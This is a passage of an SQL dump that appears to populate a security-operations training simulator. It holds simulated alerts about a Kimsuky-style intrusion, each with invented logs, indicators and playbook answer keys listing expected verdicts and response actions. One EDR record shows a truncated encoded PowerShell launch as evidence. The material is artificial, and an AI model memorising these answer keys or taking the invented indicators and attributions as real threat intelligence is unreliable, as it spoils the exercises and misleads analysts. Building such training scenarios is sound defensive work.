Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky APT infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f7851f1c1b8a8f5f6d9a2d4f5e5e5f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with mimikatz\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1485, 'Data Aggregation for Exfiltration', 'high', 'File Access Logs', 'The attackers aggregate sensitive documents and communications, focusing on information pertaining to North Korea, in preparation for data exfiltration.', 'Exfiltration Preparation', 'T1020', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:37:45Z\",\"event_id\":\"4356\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"filename\":\"NK_sensitive_docs.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"read\",\"status\":\"success\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the attacker to access sensitive files.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"NK_sensitive_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file aggregated for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System 
event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1486, 'Encrypted Data Exfiltration via C2 Channels', 'critical', 'Command and Control Traffic Logs', 'Anomalous encrypted data exfiltration detected via established C2 channels attributed to the Kimsuky group. The data exfiltration was observed from a compromised internal host to a known malicious external IP. The data was encrypted to avoid detection by network monitoring tools.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T14:22:17Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"185.22.57.200\",\"data_transferred\":\"3.5MB\",\"protocol\":\"HTTPS\",\"encryption\":\"AES-256\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"data_exfil_tool.exe\",\"user\":\"jdoe\",\"c2_domain\":\"malicious-c2.example.com\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal IP\",\"verdict\":\"internal\",\"details\":\"Internal host suspected in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.22.57.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Kimsuky C2 infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known data exfiltration tool used by Kimsuky.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"data_exfil_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable used for data exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User 
Directory\",\"verdict\":\"clean\",\"details\":\"User account involved in the incident.\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-c2.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communications by Kimsuky.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:22:17Z\\\",\\\"source_ip\\\":\\\"192.168.10.15\\\",\\\"destination_ip\\\":\\\"185.22.57.200\\\",\\\"data_transferred\\\":\\\"3.5MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"encryption\\\":\\\"AES-256\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malware_filename\\\":\\\"data_exfil_tool.exe\\\",\\\"user\\\":\\\"jdoe\\\",\\\"c2_domain\\\":\\\"malicious-c2.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1487, 'Suspicious Interview Request', 'medium', 'Email Gateway', 'A phishing email was detected targeting journalists with a fake interview request. The email attempts to entice the recipient into opening a malicious attachment or engaging with a harmful link.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Interview Request: Insights on Recent Developments\",\"email_from\":\"editor@globalnews-expert.com\",\"email_to\":\"journalist@company.com\",\"attachment_name\":\"Interview_Questions.docx\",\"attachment_md5\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns related to Kimsuky group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"editor@globalnews-expert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Domain known for impersonation in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with malware-laden 
documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"editor@globalnews-expert.com\",\"to\":\"journalist@company.com\",\"subject\":\"Interview Request: Insights on Recent Developments\",\"date\":\"2023-10-12T08:30:00Z\",\"x-mailer\":\"PHPMailer 6.0\",\"x-originating-ip\":\"203.0.113.45\"},\"attachments\":[{\"name\":\"Interview_Questions.docx\",\"size\":\"1.2MB\",\"type\":\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear colleague, we are preparing a feature on recent regional developments and would value your expert insights. The interview questions are attached for your review...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1488, 'Malicious Document Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the interview document, hidden macros execute to deploy malware, setting the stage for further compromise.', 'Malware Deployment', 'T1204.002 - User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:04Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"filename\":\"Interview_Schedule.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"process\":\"WINWORD.EXE\",\"action\":\"macro_execution\",\"alert_id\":\"malware-001\",\"severity\":\"high\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware family\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Interview_Schedule.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Document contains macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"WINWORD.EXE\",\"pid\":4980,\"user\":\"jdoe\",\"cmd\":\"WINWORD.EXE /n Interview_Schedule.docm\",\"integrity\":\"Medium\",\"children\":[102]},{\"id\":102,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"Medium\",\"children\":[103],\"highlight\":true},{\"id\":103,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"Medium\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.45\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1489, 'Persistence via Scheduled Task', 'medium', 'System Logs', 'The malware configures a scheduled task to maintain access, preparing for prolonged data collection operations. A scheduled task named \'Updater\' was created to execute malicious payload from \'C:\\Windows\\System32\\updater.exe\'.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"event_id\":4698,\"task_name\":\"Updater\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"trigger_time\":\"2023-10-12T02:00:00Z\",\"user\":\"SYSTEM\",\"source_ip\":\"10.1.1.5\",\"malware_hash\":\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\",\"attacker_ip\":\"203.0.113.45\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address involved in previous cyber-attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"Updater\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"trigger_time\\\":\\\"2023-10-12T02:00:00Z\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"malware_hash\\\":\\\"a9f3b4c8d1e2f4b6a7d9f8c5e2a1b3d5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1490, 'Lateral Movement Through Shared Drives', 'high', 'Network Traffic Analysis', 'Kimsuky leveraged compromised credentials to move laterally within the network, targeting shared drives to access sensitive data. The operation utilized suspicious network activity originating from an external IP address, accessing multiple shared drives on the 192.168.x.x network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"192.168.1.101\",\"user\":\"jdoe\",\"action\":\"access\",\"resource\":\"shared_drive_financials\",\"filename\":\"Q3_Financial_Report.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event\":\"file_access\",\"protocol\":\"SMB\",\"external_ip\":\"203.0.113.25\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network asset.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Inbound_SMB\",\"action\":\"ALLOW\",\"interface_in\":\"eth1\",\"interface_out\":\"eth0\",\"packets\":[{\"time\":\"14:22:34\",\"src\":\"203.0.113.25\",\"dst\":\"192.168.1.101\",\"proto\":\"TCP\",\"port\":445,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"14:22:35\",\"src\":\"203.0.113.25\",\"dst\":\"192.168.1.101\",\"proto\":\"TCP\",\"port\":445,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1491, 'Email Data Exfiltration via Chrome Extension', 'high', 'Browser Extension Analysis', 'A malicious Chrome extension named \'EmailHelper\' was detected exfiltrating sensitive email communications to an external server. The extension was installed by user \'jdoe\' and was transferring data to IP address 203.0.113.153. The file \'extension_data.bin\' was extracted and found to contain email content. The SHA-1 hash of the extension matches known malicious signatures.', 'Data Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"user\":\"jdoe\",\"extension_name\":\"EmailHelper\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.153\",\"file_exfiltrated\":\"extension_data.bin\",\"sha1\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"data_exfiltration\",\"protocol\":\"HTTPS\",\"destination_server\":\"maliciousserver.com\"}', '2026-03-15 19:07:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple exfiltration 